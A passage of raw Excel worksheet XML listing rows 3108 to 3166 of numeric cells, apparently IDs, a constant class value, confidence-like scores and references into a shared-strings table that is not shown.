        <v>4543</v>
      </c>
      <c r="D3108">
        <v>2</v>
      </c>
      <c r="E3108">
        <v>0.98390001058578491</v>
      </c>
      <c r="F3108" t="s">
        <v>5592</v>
      </c>
      <c r="G3108" t="s">
        <v>6145</v>
      </c>
      <c r="H3108" t="s">
        <v>6146</v>
      </c>
    </row>
    <row r="3109" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3109" s="1">
        <v>3107</v>
      </c>
      <c r="B3109">
        <v>5788</v>
      </c>
      <c r="C3109">
        <v>5788</v>
      </c>
      <c r="D3109">
        <v>2</v>
      </c>
      <c r="E3109">
        <v>0.72579997777938843</v>
      </c>
      <c r="F3109" t="s">
        <v>5592</v>
      </c>
      <c r="G3109" t="s">
        <v>6147</v>
      </c>
      <c r="H3109" t="s">
        <v>6148</v>
      </c>
    </row>
    <row r="3110" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3110" s="1">
        <v>3108</v>
      </c>
      <c r="B3110">
        <v>5976</v>
      </c>
      <c r="C3110">
        <v>5976</v>
      </c>
      <c r="D3110">
        <v>2</v>
      </c>
      <c r="E3110">
        <v>0.99570000171661377</v>
      </c>
      <c r="F3110" t="s">
        <v>5592</v>
      </c>
      <c r="G3110" t="s">
        <v>6149</v>
      </c>
      <c r="H3110" t="s">
        <v>6150</v>
      </c>
    </row>
    <row r="3111" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3111" s="1">
        <v>3109</v>
      </c>
      <c r="B3111">
        <v>6021</v>
      </c>
      <c r="C3111">
        <v>6021</v>
      </c>
      <c r="D3111">
        <v>2</v>
      </c>
      <c r="E3111">
        <v>0.99940001964569092</v>
      </c>
      <c r="F3111" t="s">
        <v>5592</v>
      </c>
      <c r="G3111" t="s">
        <v>6151</v>
      </c>
      <c r="H3111" t="s">
        <v>6152</v>
      </c>
    </row>
    <row r="3112" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3112" s="1">
        <v>3110</v>
      </c>
      <c r="B3112">
        <v>4463</v>
      </c>
      <c r="C3112">
        <v>4463</v>
      </c>
      <c r="D3112">
        <v>2</v>
      </c>
      <c r="E3112">
        <v>0.85839998722076416</v>
      </c>
      <c r="F3112" t="s">
        <v>5592</v>
      </c>
      <c r="G3112" t="s">
        <v>6153</v>
      </c>
      <c r="H3112" t="s">
        <v>6154</v>
      </c>
    </row>
    <row r="3113" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3113" s="1">
        <v>3111</v>
      </c>
      <c r="B3113">
        <v>5757</v>
      </c>
      <c r="C3113">
        <v>5757</v>
      </c>
      <c r="D3113">
        <v>2</v>
      </c>
      <c r="E3113">
        <v>0.99970000982284546</v>
      </c>
      <c r="F3113" t="s">
        <v>5592</v>
      </c>
      <c r="G3113" t="s">
        <v>6155</v>
      </c>
      <c r="H3113" t="s">
        <v>6156</v>
      </c>
    </row>
    <row r="3114" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3114" s="1">
        <v>3112</v>
      </c>
      <c r="B3114">
        <v>4464</v>
      </c>
      <c r="C3114">
        <v>4464</v>
      </c>
      <c r="D3114">
        <v>2</v>
      </c>
      <c r="E3114">
        <v>0.63330000638961792</v>
      </c>
      <c r="F3114" t="s">
        <v>5592</v>
      </c>
      <c r="G3114" t="s">
        <v>6157</v>
      </c>
      <c r="H3114" t="s">
        <v>6158</v>
      </c>
    </row>
    <row r="3115" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3115" s="1">
        <v>3113</v>
      </c>
      <c r="B3115">
        <v>4465</v>
      </c>
      <c r="C3115">
        <v>4465</v>
      </c>
      <c r="D3115">
        <v>2</v>
      </c>
      <c r="E3115">
        <v>0.97790002822875977</v>
      </c>
      <c r="F3115" t="s">
        <v>5592</v>
      </c>
      <c r="G3115" t="s">
        <v>6159</v>
      </c>
      <c r="H3115" t="s">
        <v>6160</v>
      </c>
    </row>
    <row r="3116" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3116" s="1">
        <v>3114</v>
      </c>
      <c r="B3116">
        <v>4467</v>
      </c>
      <c r="C3116">
        <v>4467</v>
      </c>
      <c r="D3116">
        <v>2</v>
      </c>
      <c r="E3116">
        <v>0.99739998579025269</v>
      </c>
      <c r="F3116" t="s">
        <v>5592</v>
      </c>
      <c r="G3116" t="s">
        <v>6161</v>
      </c>
      <c r="H3116" t="s">
        <v>6162</v>
      </c>
    </row>
    <row r="3117" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3117" s="1">
        <v>3115</v>
      </c>
      <c r="B3117">
        <v>4468</v>
      </c>
      <c r="C3117">
        <v>4468</v>
      </c>
      <c r="D3117">
        <v>2</v>
      </c>
      <c r="E3117">
        <v>0.98079997301101685</v>
      </c>
      <c r="F3117" t="s">
        <v>5592</v>
      </c>
      <c r="G3117" t="s">
        <v>6163</v>
      </c>
      <c r="H3117" t="s">
        <v>6164</v>
      </c>
    </row>
    <row r="3118" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3118" s="1">
        <v>3116</v>
      </c>
      <c r="B3118">
        <v>6020</v>
      </c>
      <c r="C3118">
        <v>6020</v>
      </c>
      <c r="D3118">
        <v>2</v>
      </c>
      <c r="E3118">
        <v>0.62989997863769531</v>
      </c>
      <c r="F3118" t="s">
        <v>5592</v>
      </c>
      <c r="G3118" t="s">
        <v>6165</v>
      </c>
      <c r="H3118" t="s">
        <v>6166</v>
      </c>
    </row>
    <row r="3119" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3119" s="1">
        <v>3117</v>
      </c>
      <c r="B3119">
        <v>5147</v>
      </c>
      <c r="C3119">
        <v>5147</v>
      </c>
      <c r="D3119">
        <v>2</v>
      </c>
      <c r="E3119">
        <v>0.84179997444152832</v>
      </c>
      <c r="F3119" t="s">
        <v>5592</v>
      </c>
      <c r="G3119" t="s">
        <v>6167</v>
      </c>
      <c r="H3119" t="s">
        <v>6168</v>
      </c>
    </row>
    <row r="3120" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3120" s="1">
        <v>3118</v>
      </c>
      <c r="B3120">
        <v>5146</v>
      </c>
      <c r="C3120">
        <v>5146</v>
      </c>
      <c r="D3120">
        <v>2</v>
      </c>
      <c r="E3120">
        <v>0.9934999942779541</v>
      </c>
      <c r="F3120" t="s">
        <v>5592</v>
      </c>
      <c r="G3120" t="s">
        <v>6169</v>
      </c>
      <c r="H3120" t="s">
        <v>6170</v>
      </c>
    </row>
    <row r="3121" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3121" s="1">
        <v>3119</v>
      </c>
      <c r="B3121">
        <v>6019</v>
      </c>
      <c r="C3121">
        <v>6019</v>
      </c>
      <c r="D3121">
        <v>2</v>
      </c>
      <c r="E3121">
        <v>0.60790002346038818</v>
      </c>
      <c r="F3121" t="s">
        <v>5592</v>
      </c>
      <c r="G3121" t="s">
        <v>6171</v>
      </c>
      <c r="H3121" t="s">
        <v>6172</v>
      </c>
    </row>
    <row r="3122" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3122" s="1">
        <v>3120</v>
      </c>
      <c r="B3122">
        <v>4473</v>
      </c>
      <c r="C3122">
        <v>4473</v>
      </c>
      <c r="D3122">
        <v>2</v>
      </c>
      <c r="E3122">
        <v>0.63370001316070557</v>
      </c>
      <c r="F3122" t="s">
        <v>5592</v>
      </c>
      <c r="G3122" t="s">
        <v>6173</v>
      </c>
      <c r="H3122" t="s">
        <v>6174</v>
      </c>
    </row>
    <row r="3123" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3123" s="1">
        <v>3121</v>
      </c>
      <c r="B3123">
        <v>5145</v>
      </c>
      <c r="C3123">
        <v>5145</v>
      </c>
      <c r="D3123">
        <v>2</v>
      </c>
      <c r="E3123">
        <v>0.99800002574920654</v>
      </c>
      <c r="F3123" t="s">
        <v>5592</v>
      </c>
      <c r="G3123" t="s">
        <v>6175</v>
      </c>
      <c r="H3123" t="s">
        <v>6176</v>
      </c>
    </row>
    <row r="3124" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3124" s="1">
        <v>3122</v>
      </c>
      <c r="B3124">
        <v>4475</v>
      </c>
      <c r="C3124">
        <v>4475</v>
      </c>
      <c r="D3124">
        <v>2</v>
      </c>
      <c r="E3124">
        <v>0.77450001239776611</v>
      </c>
      <c r="F3124" t="s">
        <v>5592</v>
      </c>
      <c r="G3124" t="s">
        <v>6177</v>
      </c>
      <c r="H3124" t="s">
        <v>6178</v>
      </c>
    </row>
    <row r="3125" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3125" s="1">
        <v>3123</v>
      </c>
      <c r="B3125">
        <v>4476</v>
      </c>
      <c r="C3125">
        <v>4476</v>
      </c>
      <c r="D3125">
        <v>2</v>
      </c>
      <c r="E3125">
        <v>0.99629998207092285</v>
      </c>
      <c r="F3125" t="s">
        <v>5592</v>
      </c>
      <c r="G3125" t="s">
        <v>6179</v>
      </c>
      <c r="H3125" t="s">
        <v>6180</v>
      </c>
    </row>
    <row r="3126" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3126" s="1">
        <v>3124</v>
      </c>
      <c r="B3126">
        <v>4460</v>
      </c>
      <c r="C3126">
        <v>4460</v>
      </c>
      <c r="D3126">
        <v>2</v>
      </c>
      <c r="E3126">
        <v>0.77439999580383301</v>
      </c>
      <c r="F3126" t="s">
        <v>5592</v>
      </c>
      <c r="G3126" t="s">
        <v>6181</v>
      </c>
      <c r="H3126" t="s">
        <v>6182</v>
      </c>
    </row>
    <row r="3127" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3127" s="1">
        <v>3125</v>
      </c>
      <c r="B3127">
        <v>4458</v>
      </c>
      <c r="C3127">
        <v>4458</v>
      </c>
      <c r="D3127">
        <v>2</v>
      </c>
      <c r="E3127">
        <v>0.62790000438690186</v>
      </c>
      <c r="F3127" t="s">
        <v>5592</v>
      </c>
      <c r="G3127" t="s">
        <v>6183</v>
      </c>
      <c r="H3127" t="s">
        <v>6184</v>
      </c>
    </row>
    <row r="3128" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3128" s="1">
        <v>3126</v>
      </c>
      <c r="B3128">
        <v>5755</v>
      </c>
      <c r="C3128">
        <v>5755</v>
      </c>
      <c r="D3128">
        <v>2</v>
      </c>
      <c r="E3128">
        <v>0.99910002946853638</v>
      </c>
      <c r="F3128" t="s">
        <v>5592</v>
      </c>
      <c r="G3128" t="s">
        <v>6185</v>
      </c>
      <c r="H3128" t="s">
        <v>6186</v>
      </c>
    </row>
    <row r="3129" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3129" s="1">
        <v>3127</v>
      </c>
      <c r="B3129">
        <v>4457</v>
      </c>
      <c r="C3129">
        <v>4457</v>
      </c>
      <c r="D3129">
        <v>2</v>
      </c>
      <c r="E3129">
        <v>0.99099999666213989</v>
      </c>
      <c r="F3129" t="s">
        <v>5592</v>
      </c>
      <c r="G3129" t="s">
        <v>6187</v>
      </c>
      <c r="H3129" t="s">
        <v>6188</v>
      </c>
    </row>
    <row r="3130" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3130" s="1">
        <v>3128</v>
      </c>
      <c r="B3130">
        <v>5164</v>
      </c>
      <c r="C3130">
        <v>5164</v>
      </c>
      <c r="D3130">
        <v>2</v>
      </c>
      <c r="E3130">
        <v>0.48489999771118159</v>
      </c>
      <c r="F3130" t="s">
        <v>5592</v>
      </c>
      <c r="G3130" t="s">
        <v>6189</v>
      </c>
      <c r="H3130" t="s">
        <v>6190</v>
      </c>
    </row>
    <row r="3131" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3131" s="1">
        <v>3129</v>
      </c>
      <c r="B3131">
        <v>6032</v>
      </c>
      <c r="C3131">
        <v>6032</v>
      </c>
      <c r="D3131">
        <v>2</v>
      </c>
      <c r="E3131">
        <v>0.89639997482299805</v>
      </c>
      <c r="F3131" t="s">
        <v>5592</v>
      </c>
      <c r="G3131" t="s">
        <v>6191</v>
      </c>
      <c r="H3131" t="s">
        <v>6192</v>
      </c>
    </row>
    <row r="3132" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3132" s="1">
        <v>3130</v>
      </c>
      <c r="B3132">
        <v>4437</v>
      </c>
      <c r="C3132">
        <v>4437</v>
      </c>
      <c r="D3132">
        <v>2</v>
      </c>
      <c r="E3132">
        <v>0.9869999885559082</v>
      </c>
      <c r="F3132" t="s">
        <v>5592</v>
      </c>
      <c r="G3132" t="s">
        <v>6193</v>
      </c>
      <c r="H3132" t="s">
        <v>6194</v>
      </c>
    </row>
    <row r="3133" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3133" s="1">
        <v>3131</v>
      </c>
      <c r="B3133">
        <v>6029</v>
      </c>
      <c r="C3133">
        <v>6029</v>
      </c>
      <c r="D3133">
        <v>2</v>
      </c>
      <c r="E3133">
        <v>0.76829999685287476</v>
      </c>
      <c r="F3133" t="s">
        <v>5592</v>
      </c>
      <c r="G3133" t="s">
        <v>6195</v>
      </c>
      <c r="H3133" t="s">
        <v>6196</v>
      </c>
    </row>
    <row r="3134" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3134" s="1">
        <v>3132</v>
      </c>
      <c r="B3134">
        <v>4439</v>
      </c>
      <c r="C3134">
        <v>4439</v>
      </c>
      <c r="D3134">
        <v>2</v>
      </c>
      <c r="E3134">
        <v>0.99949997663497925</v>
      </c>
      <c r="F3134" t="s">
        <v>5592</v>
      </c>
      <c r="G3134" t="s">
        <v>6197</v>
      </c>
      <c r="H3134" t="s">
        <v>6198</v>
      </c>
    </row>
    <row r="3135" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3135" s="1">
        <v>3133</v>
      </c>
      <c r="B3135">
        <v>4441</v>
      </c>
      <c r="C3135">
        <v>4441</v>
      </c>
      <c r="D3135">
        <v>2</v>
      </c>
      <c r="E3135">
        <v>0.9968000054359436</v>
      </c>
      <c r="F3135" t="s">
        <v>5592</v>
      </c>
      <c r="G3135" t="s">
        <v>6199</v>
      </c>
      <c r="H3135" t="s">
        <v>6200</v>
      </c>
    </row>
    <row r="3136" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3136" s="1">
        <v>3134</v>
      </c>
      <c r="B3136">
        <v>5162</v>
      </c>
      <c r="C3136">
        <v>5162</v>
      </c>
      <c r="D3136">
        <v>2</v>
      </c>
      <c r="E3136">
        <v>0.50599998235702515</v>
      </c>
      <c r="F3136" t="s">
        <v>5592</v>
      </c>
      <c r="G3136" t="s">
        <v>6201</v>
      </c>
      <c r="H3136" t="s">
        <v>6202</v>
      </c>
    </row>
    <row r="3137" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3137" s="1">
        <v>3135</v>
      </c>
      <c r="B3137">
        <v>6018</v>
      </c>
      <c r="C3137">
        <v>6018</v>
      </c>
      <c r="D3137">
        <v>2</v>
      </c>
      <c r="E3137">
        <v>0.80629998445510864</v>
      </c>
      <c r="F3137" t="s">
        <v>5592</v>
      </c>
      <c r="G3137" t="s">
        <v>6203</v>
      </c>
      <c r="H3137" t="s">
        <v>6204</v>
      </c>
    </row>
    <row r="3138" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3138" s="1">
        <v>3136</v>
      </c>
      <c r="B3138">
        <v>4445</v>
      </c>
      <c r="C3138">
        <v>4445</v>
      </c>
      <c r="D3138">
        <v>2</v>
      </c>
      <c r="E3138">
        <v>0.99639999866485596</v>
      </c>
      <c r="F3138" t="s">
        <v>5592</v>
      </c>
      <c r="G3138" t="s">
        <v>6205</v>
      </c>
      <c r="H3138" t="s">
        <v>6206</v>
      </c>
    </row>
    <row r="3139" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3139" s="1">
        <v>3137</v>
      </c>
      <c r="B3139">
        <v>4446</v>
      </c>
      <c r="C3139">
        <v>4446</v>
      </c>
      <c r="D3139">
        <v>2</v>
      </c>
      <c r="E3139">
        <v>0.99709999561309814</v>
      </c>
      <c r="F3139" t="s">
        <v>5592</v>
      </c>
      <c r="G3139" t="s">
        <v>6207</v>
      </c>
      <c r="H3139" t="s">
        <v>6208</v>
      </c>
    </row>
    <row r="3140" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3140" s="1">
        <v>3138</v>
      </c>
      <c r="B3140">
        <v>4447</v>
      </c>
      <c r="C3140">
        <v>4447</v>
      </c>
      <c r="D3140">
        <v>2</v>
      </c>
      <c r="E3140">
        <v>0.60149997472763062</v>
      </c>
      <c r="F3140" t="s">
        <v>5592</v>
      </c>
      <c r="G3140" t="s">
        <v>6209</v>
      </c>
      <c r="H3140" t="s">
        <v>6210</v>
      </c>
    </row>
    <row r="3141" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3141" s="1">
        <v>3139</v>
      </c>
      <c r="B3141">
        <v>6027</v>
      </c>
      <c r="C3141">
        <v>6027</v>
      </c>
      <c r="D3141">
        <v>2</v>
      </c>
      <c r="E3141">
        <v>0.96380001306533813</v>
      </c>
      <c r="F3141" t="s">
        <v>5592</v>
      </c>
      <c r="G3141" t="s">
        <v>6211</v>
      </c>
      <c r="H3141" t="s">
        <v>6212</v>
      </c>
    </row>
    <row r="3142" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3142" s="1">
        <v>3140</v>
      </c>
      <c r="B3142">
        <v>4450</v>
      </c>
      <c r="C3142">
        <v>4450</v>
      </c>
      <c r="D3142">
        <v>2</v>
      </c>
      <c r="E3142">
        <v>0.78659999370574951</v>
      </c>
      <c r="F3142" t="s">
        <v>5592</v>
      </c>
      <c r="G3142" t="s">
        <v>6213</v>
      </c>
      <c r="H3142" t="s">
        <v>6214</v>
      </c>
    </row>
    <row r="3143" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3143" s="1">
        <v>3141</v>
      </c>
      <c r="B3143">
        <v>4451</v>
      </c>
      <c r="C3143">
        <v>4451</v>
      </c>
      <c r="D3143">
        <v>2</v>
      </c>
      <c r="E3143">
        <v>0.54269999265670776</v>
      </c>
      <c r="F3143" t="s">
        <v>5592</v>
      </c>
      <c r="G3143" t="s">
        <v>6215</v>
      </c>
      <c r="H3143" t="s">
        <v>6216</v>
      </c>
    </row>
    <row r="3144" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3144" s="1">
        <v>3142</v>
      </c>
      <c r="B3144">
        <v>6025</v>
      </c>
      <c r="C3144">
        <v>6025</v>
      </c>
      <c r="D3144">
        <v>2</v>
      </c>
      <c r="E3144">
        <v>0.83240002393722534</v>
      </c>
      <c r="F3144" t="s">
        <v>5592</v>
      </c>
      <c r="G3144" t="s">
        <v>6217</v>
      </c>
      <c r="H3144" t="s">
        <v>6218</v>
      </c>
    </row>
    <row r="3145" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3145" s="1">
        <v>3143</v>
      </c>
      <c r="B3145">
        <v>4455</v>
      </c>
      <c r="C3145">
        <v>4455</v>
      </c>
      <c r="D3145">
        <v>2</v>
      </c>
      <c r="E3145">
        <v>0.97049999237060547</v>
      </c>
      <c r="F3145" t="s">
        <v>5592</v>
      </c>
      <c r="G3145" t="s">
        <v>6219</v>
      </c>
      <c r="H3145" t="s">
        <v>6220</v>
      </c>
    </row>
    <row r="3146" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3146" s="1">
        <v>3144</v>
      </c>
      <c r="B3146">
        <v>5160</v>
      </c>
      <c r="C3146">
        <v>5160</v>
      </c>
      <c r="D3146">
        <v>2</v>
      </c>
      <c r="E3146">
        <v>0.8367999792098999</v>
      </c>
      <c r="F3146" t="s">
        <v>5592</v>
      </c>
      <c r="G3146" t="s">
        <v>6221</v>
      </c>
      <c r="H3146" t="s">
        <v>6222</v>
      </c>
    </row>
    <row r="3147" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3147" s="1">
        <v>3145</v>
      </c>
      <c r="B3147">
        <v>5144</v>
      </c>
      <c r="C3147">
        <v>5144</v>
      </c>
      <c r="D3147">
        <v>2</v>
      </c>
      <c r="E3147">
        <v>0.99860000610351563</v>
      </c>
      <c r="F3147" t="s">
        <v>5592</v>
      </c>
      <c r="G3147" t="s">
        <v>6223</v>
      </c>
      <c r="H3147" t="s">
        <v>6224</v>
      </c>
    </row>
    <row r="3148" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3148" s="1">
        <v>3146</v>
      </c>
      <c r="B3148">
        <v>5143</v>
      </c>
      <c r="C3148">
        <v>5143</v>
      </c>
      <c r="D3148">
        <v>2</v>
      </c>
      <c r="E3148">
        <v>0.72899997234344482</v>
      </c>
      <c r="F3148" t="s">
        <v>5592</v>
      </c>
      <c r="G3148" t="s">
        <v>6225</v>
      </c>
      <c r="H3148" t="s">
        <v>6226</v>
      </c>
    </row>
    <row r="3149" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3149" s="1">
        <v>3147</v>
      </c>
      <c r="B3149">
        <v>4483</v>
      </c>
      <c r="C3149">
        <v>4483</v>
      </c>
      <c r="D3149">
        <v>2</v>
      </c>
      <c r="E3149">
        <v>0.99580001831054688</v>
      </c>
      <c r="F3149" t="s">
        <v>5592</v>
      </c>
      <c r="G3149" t="s">
        <v>6227</v>
      </c>
      <c r="H3149" t="s">
        <v>6228</v>
      </c>
    </row>
    <row r="3150" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3150" s="1">
        <v>3148</v>
      </c>
      <c r="B3150">
        <v>4516</v>
      </c>
      <c r="C3150">
        <v>4516</v>
      </c>
      <c r="D3150">
        <v>2</v>
      </c>
      <c r="E3150">
        <v>0.83380001783370972</v>
      </c>
      <c r="F3150" t="s">
        <v>5592</v>
      </c>
      <c r="G3150" t="s">
        <v>6229</v>
      </c>
      <c r="H3150" t="s">
        <v>6230</v>
      </c>
    </row>
    <row r="3151" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3151" s="1">
        <v>3149</v>
      </c>
      <c r="B3151">
        <v>5990</v>
      </c>
      <c r="C3151">
        <v>5990</v>
      </c>
      <c r="D3151">
        <v>2</v>
      </c>
      <c r="E3151">
        <v>0.99699997901916504</v>
      </c>
      <c r="F3151" t="s">
        <v>5592</v>
      </c>
      <c r="G3151" t="s">
        <v>6231</v>
      </c>
      <c r="H3151" t="s">
        <v>6232</v>
      </c>
    </row>
    <row r="3152" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3152" s="1">
        <v>3150</v>
      </c>
      <c r="B3152">
        <v>4519</v>
      </c>
      <c r="C3152">
        <v>4519</v>
      </c>
      <c r="D3152">
        <v>2</v>
      </c>
      <c r="E3152">
        <v>0.9879000186920166</v>
      </c>
      <c r="F3152" t="s">
        <v>5592</v>
      </c>
      <c r="G3152" t="s">
        <v>6233</v>
      </c>
      <c r="H3152" t="s">
        <v>6234</v>
      </c>
    </row>
    <row r="3153" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3153" s="1">
        <v>3151</v>
      </c>
      <c r="B3153">
        <v>4522</v>
      </c>
      <c r="C3153">
        <v>4522</v>
      </c>
      <c r="D3153">
        <v>2</v>
      </c>
      <c r="E3153">
        <v>0.98000001907348633</v>
      </c>
      <c r="F3153" t="s">
        <v>5592</v>
      </c>
      <c r="G3153" t="s">
        <v>6235</v>
      </c>
      <c r="H3153" t="s">
        <v>6236</v>
      </c>
    </row>
    <row r="3154" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3154" s="1">
        <v>3152</v>
      </c>
      <c r="B3154">
        <v>5777</v>
      </c>
      <c r="C3154">
        <v>5777</v>
      </c>
      <c r="D3154">
        <v>2</v>
      </c>
      <c r="E3154">
        <v>0.83230000734329224</v>
      </c>
      <c r="F3154" t="s">
        <v>5592</v>
      </c>
      <c r="G3154" t="s">
        <v>6237</v>
      </c>
      <c r="H3154" t="s">
        <v>6238</v>
      </c>
    </row>
    <row r="3155" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3155" s="1">
        <v>3153</v>
      </c>
      <c r="B3155">
        <v>5780</v>
      </c>
      <c r="C3155">
        <v>5780</v>
      </c>
      <c r="D3155">
        <v>2</v>
      </c>
      <c r="E3155">
        <v>0.83230000734329224</v>
      </c>
      <c r="F3155" t="s">
        <v>5592</v>
      </c>
      <c r="G3155" t="s">
        <v>6239</v>
      </c>
      <c r="H3155" t="s">
        <v>6238</v>
      </c>
    </row>
    <row r="3156" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3156" s="1">
        <v>3154</v>
      </c>
      <c r="B3156">
        <v>4523</v>
      </c>
      <c r="C3156">
        <v>4523</v>
      </c>
      <c r="D3156">
        <v>2</v>
      </c>
      <c r="E3156">
        <v>0.98570001125335693</v>
      </c>
      <c r="F3156" t="s">
        <v>5592</v>
      </c>
      <c r="G3156" t="s">
        <v>6240</v>
      </c>
      <c r="H3156" t="s">
        <v>6241</v>
      </c>
    </row>
    <row r="3157" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3157" s="1">
        <v>3155</v>
      </c>
      <c r="B3157">
        <v>5773</v>
      </c>
      <c r="C3157">
        <v>5773</v>
      </c>
      <c r="D3157">
        <v>2</v>
      </c>
      <c r="E3157">
        <v>0.45559999346733088</v>
      </c>
      <c r="F3157" t="s">
        <v>5592</v>
      </c>
      <c r="G3157" t="s">
        <v>6242</v>
      </c>
      <c r="H3157" t="s">
        <v>6243</v>
      </c>
    </row>
    <row r="3158" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3158" s="1">
        <v>3156</v>
      </c>
      <c r="B3158">
        <v>4525</v>
      </c>
      <c r="C3158">
        <v>4525</v>
      </c>
      <c r="D3158">
        <v>2</v>
      </c>
      <c r="E3158">
        <v>0.93519997596740723</v>
      </c>
      <c r="F3158" t="s">
        <v>5592</v>
      </c>
      <c r="G3158" t="s">
        <v>6244</v>
      </c>
      <c r="H3158" t="s">
        <v>6245</v>
      </c>
    </row>
    <row r="3159" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3159" s="1">
        <v>3157</v>
      </c>
      <c r="B3159">
        <v>4531</v>
      </c>
      <c r="C3159">
        <v>4531</v>
      </c>
      <c r="D3159">
        <v>2</v>
      </c>
      <c r="E3159">
        <v>0.81290000677108765</v>
      </c>
      <c r="F3159" t="s">
        <v>5592</v>
      </c>
      <c r="G3159" t="s">
        <v>6246</v>
      </c>
      <c r="H3159" t="s">
        <v>6247</v>
      </c>
    </row>
    <row r="3160" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3160" s="1">
        <v>3158</v>
      </c>
      <c r="B3160">
        <v>5787</v>
      </c>
      <c r="C3160">
        <v>5787</v>
      </c>
      <c r="D3160">
        <v>2</v>
      </c>
      <c r="E3160">
        <v>0.86129999160766602</v>
      </c>
      <c r="F3160" t="s">
        <v>5592</v>
      </c>
      <c r="G3160" t="s">
        <v>6248</v>
      </c>
      <c r="H3160" t="s">
        <v>6249</v>
      </c>
    </row>
    <row r="3161" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3161" s="1">
        <v>3159</v>
      </c>
      <c r="B3161">
        <v>4532</v>
      </c>
      <c r="C3161">
        <v>4532</v>
      </c>
      <c r="D3161">
        <v>2</v>
      </c>
      <c r="E3161">
        <v>0.62080001831054688</v>
      </c>
      <c r="F3161" t="s">
        <v>5592</v>
      </c>
      <c r="G3161" t="s">
        <v>6250</v>
      </c>
      <c r="H3161" t="s">
        <v>6251</v>
      </c>
    </row>
    <row r="3162" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3162" s="1">
        <v>3160</v>
      </c>
      <c r="B3162">
        <v>5980</v>
      </c>
      <c r="C3162">
        <v>5980</v>
      </c>
      <c r="D3162">
        <v>2</v>
      </c>
      <c r="E3162">
        <v>0.99860000610351563</v>
      </c>
      <c r="F3162" t="s">
        <v>5592</v>
      </c>
      <c r="G3162" t="s">
        <v>6252</v>
      </c>
      <c r="H3162" t="s">
        <v>6253</v>
      </c>
    </row>
    <row r="3163" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3163" s="1">
        <v>3161</v>
      </c>
      <c r="B3163">
        <v>4535</v>
      </c>
      <c r="C3163">
        <v>4535</v>
      </c>
      <c r="D3163">
        <v>2</v>
      </c>
      <c r="E3163">
        <v>0.99199998378753662</v>
      </c>
      <c r="F3163" t="s">
        <v>5592</v>
      </c>
      <c r="G3163" t="s">
        <v>6254</v>
      </c>
      <c r="H3163" t="s">
        <v>6255</v>
      </c>
    </row>
    <row r="3164" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3164" s="1">
        <v>3162</v>
      </c>
      <c r="B3164">
        <v>4537</v>
      </c>
      <c r="C3164">
        <v>4537</v>
      </c>
      <c r="D3164">
        <v>2</v>
      </c>
      <c r="E3164">
        <v>0.99550002813339233</v>
      </c>
      <c r="F3164" t="s">
        <v>5592</v>
      </c>
      <c r="G3164" t="s">
        <v>6256</v>
      </c>
      <c r="H3164" t="s">
        <v>6257</v>
      </c>
    </row>
    <row r="3165" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3165" s="1">
        <v>3163</v>
      </c>
      <c r="B3165">
        <v>5978</v>
      </c>
      <c r="C3165">
        <v>5978</v>
      </c>
      <c r="D3165">
        <v>2</v>
      </c>
      <c r="E3165">
        <v>0.57669997215270996</v>
      </c>
      <c r="F3165" t="s">
        <v>5592</v>
      </c>
      <c r="G3165" t="s">
        <v>6258</v>
      </c>
      <c r="H3165" t="s">
        <v>6259</v>
      </c>
    </row>
    <row r="3166" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3166" s="1">
        <v>3164</v>
      </c>
      <c r="B3166">
        <v>5786</v>
      </c>
      <c r="C3166">
        <v>5786</v>
      </c>
      <c r="D3166">
        <v>2</v>
      </c>
      <c r="E3166">
        <v>0.9189000129699707</v>
      </c>
      <c r="F3166" t="s">
        <v>5592</v>
